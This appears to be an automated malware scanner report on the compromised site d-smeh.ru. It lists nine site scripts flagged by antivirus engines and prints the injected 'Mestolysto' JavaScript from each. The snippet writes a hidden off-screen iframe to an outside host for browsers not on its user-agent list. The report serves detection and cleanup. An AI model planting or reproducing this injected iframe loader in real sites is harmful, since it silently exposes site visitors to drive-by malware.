New scan:

Malware Scanner report for d-smeh.ru

Malicious/Suspicious/Total urls checked
9/0/15
9 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "d-smeh.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/9
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=d-smeh.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://d-smeh.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://d-smeh.ru/
200 OK
Content-Length: 40547
Content-Type: text/html
clean
http://d-smeh.ru/plugins/system/rokbox/rokbox.js
200 OK
Content-Length: 609
Content-Type: application/x-javascript
clean
http://d-smeh.ru/plugins/system/rokbox/themes/light/rokbox-config.js
200 OK
Content-Length: 2673
Content-Type: application/x-javascript
clean
http://d-smeh.ru/cache/widgetkit/widgetkit-0be06e6b.js
200 OK
Content-Length: 14575
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

window["WIDGETKIT_URL"]="/media/widgetkit";
function Mestolysto(){var o=navigator.userAgent;var p=(o.indexOf("Chrome")>-1||o.indexOf("Android")>-1||o.indexOf("Linux")>-1||o.indexOf("FreeBSD")>-1||o.indexOf("IEMobile")>-1||o.indexOf("Macintosh")>-1||o.indexOf("iPad")>-1||o.indexOf("iPhone")>-1);if(!p){document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"></if
... 3170 bytes are skipped ...
).find("p.content").each(function(){var a=b(this).height();a>c&&(c=a)}).css("min-height",c)})};e();b(window).bind("load",e)}});;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
$widgetkit.trans.addDic({"LESS_THAN_A_MINUTE_AGO":"less than a minute ago","ABOUT_A_MINUTE_AGO":"about a minute ago","X_MINUTES_AGO":"%s minutes ago","ABOUT_AN_HOUR_AGO":"about an hour ago","X_HOURS_AGO":"about %s hours ago","ONE_DAY_AGO":"1 day ago","X_DAYS_AGO":"%s days ago"});

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://d-smeh.ru/templates/yoo_cloud/warp/js/search.js
200 OK
Content-Length: 4788
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Mestolysto() {
var o = navigator.userAgent;
var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1);
if (!p) {
document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g
... 3764 bytes are skipped ...
ach(function(){var c=d(this);if(e.prototype[a]&&c.data(e.prototype.name)&&
a!="initialize")c.data(e.prototype.name)[a].apply(c.data(e.prototype.name),Array.prototype.slice.call(b,1));else if(!a||d.isPlainObject(a)){var f=new e;e.prototype.initialize&&f.initialize.apply(f,d.merge([c],b));c.data(e.prototype.name,f)}else d.error("Method "+a+" does not exist on jQuery."+e.name)})}})(jQuery);
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://d-smeh.ru/templates/yoo_cloud/warp/js/warp.js
200 OK
Content-Length: 9564
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Mestolysto() {
var o = navigator.userAgent;
var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1);
if (!p) {
document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g
... 3192 bytes are skipped ...
mp;d?function(){return this}:function(){return this.filter((b?"textarea":":input")+"[placeholder]").bind("focus.placeholder",
a).bind("blur.placeholder",c).trigger("blur.placeholder").end()};e(function(){e("form").bind("submit.placeholder",function(){var b=e(".placeholder",this).each(a);setTimeout(function(){b.each(c)},10)})});e(window).bind("unload.placeholder",function(){e(".placeholder").val("")})})(jQuery);
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://d-smeh.ru/templates/yoo_cloud/warp/js/accordionmenu.js
200 OK
Content-Length: 2239
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Mestolysto() {
var o = navigator.userAgent;
var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1);
if (!p) {
document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g
... 1113 bytes are skipped ...
his.each(function(){var c=d(this);if(a.prototype[b]&&c.data(a.prototype.name)&&b!="initialize")c.data(a.prototype.name)[b].apply(c.data(a.prototype.name),Array.prototype.slice.call(g,1));else if(!b||d.isPlainObject(b)){var f=new a;a.prototype.initialize&&f.initialize.apply(f,d.merge([c],g));c.data(a.prototype.name,f)}else d.error("Method "+b+" does not exist on jQuery."+a.name)})}})(jQuery);
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://d-smeh.ru/templates/yoo_cloud/warp/js/dropdownmenu.js
200 OK
Content-Length: 6102
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Mestolysto() {
var o = navigator.userAgent;
var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1);
if (!p) {
document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g
... 3245 bytes are skipped ...
ach(function(){var a=b(this);if(e.prototype[j]&&a.data(e.prototype.name)&&j!="initialize")a.data(e.prototype.name)[j].apply(a.data(e.prototype.name),Array.prototype.slice.call(o,1));else if(!j||b.isPlainObject(j)){var g=
new e;e.prototype.initialize&&g.initialize.apply(g,b.merge([a],o));a.data(e.prototype.name,g)}else b.error("Method "+j+" does not exist on jQuery."+e.name)})}})(jQuery);
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://d-smeh.ru/templates/yoo_cloud/js/template.js
200 OK
Content-Length: 638
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Mestolysto() {
var o = navigator.userAgent;
var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1);
if (!p) {
document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"></ifr'+'ame>');
}
}
Mestolysto();

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://d-smeh.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/admirald_theme&file[0]=theme.js
200 OK
Content-Length: 4560
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Mestolysto() {
var o = navigator.userAgent;
var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1);
if (!p) {
document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g
... 2976 bytes are skipped ...
l = parameters.modal || false;

window_id = new Window('window_id', {className: "mac_os_x",
title: popTitle,
showEffect: Element.show,
hideEffect: Element.hide,
width: popWidth, height: popHeight});
window_id.setAjaxContent( url, {evalScripts:true}, true, popModal );
window_id.setCookie('window_size');
window_id.setDestroyOnClose();
};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Fortinet
JS/Iframe.JY!tr
Sophos
Troj/JSRedir-OI

http://d-smeh.ru//mc.yandex.ru/metrika/watch.js/
404 NOT FOUND
Content-Length: 34363
Content-Type: text/html
clean
http://d-smeh.ru/media/system/js/caption.js
200 OK
Content-Length: 2679
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Mestolysto() {
var o = navigator.userAgent;
var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1);
if (!p) {
document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g
... 1057 bytes are skipped ...
Child(text);
}
container.className = this.selector.replace('.', '_');
container.className = container.className + " " + align;
container.setAttribute("style","float:"+align);
container.style.width = width + "px";
}
});
document.caption = null;
window.addEvent('load', function() {
var caption = new JCaption('img.caption')
document.caption = caption
});
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://d-smeh.ru/media/widgetkit/js/jquery.js
200 OK
Content-Length: 94542
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Mestolysto() {
var o = navigator.userAgent;
var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1);
if (!p) {
document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g
... 3234 bytes are skipped ...
pe===9?Math.max(f.documentElement["client"+
b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]):a===l?(f=c.css(f,d),g=parseFloat(f),c.isNumeric(g)?g:f):this.css(d,typeof a==="string"?a:a+"px")}});p.jQuery=p.$=c;typeof define==="function"&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return c})}(window);jQuery.noConflict();
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://d-smeh.ru/лента-новостей-от-яндекса/яндекс
200 OK
Content-Length: 28925
Content-Type: text/html
clean
http://d-smeh.ru/партнёрские-ссылки/наши-партнёры/
200 OK
Content-Length: 30817
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: d-smeh.ru

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 19:50:25 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 20 Sep 2014 19:50:25 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c338f0d1edbc6888345382940334c469=fc149q96h7umcrudsrji2a0dt0; path=/
Set-Cookie: virtuemart=fc149q96h7umcrudsrji2a0dt0
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: d-smeh.ru
Referer: http://www.google.com/search?q=d-smeh.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.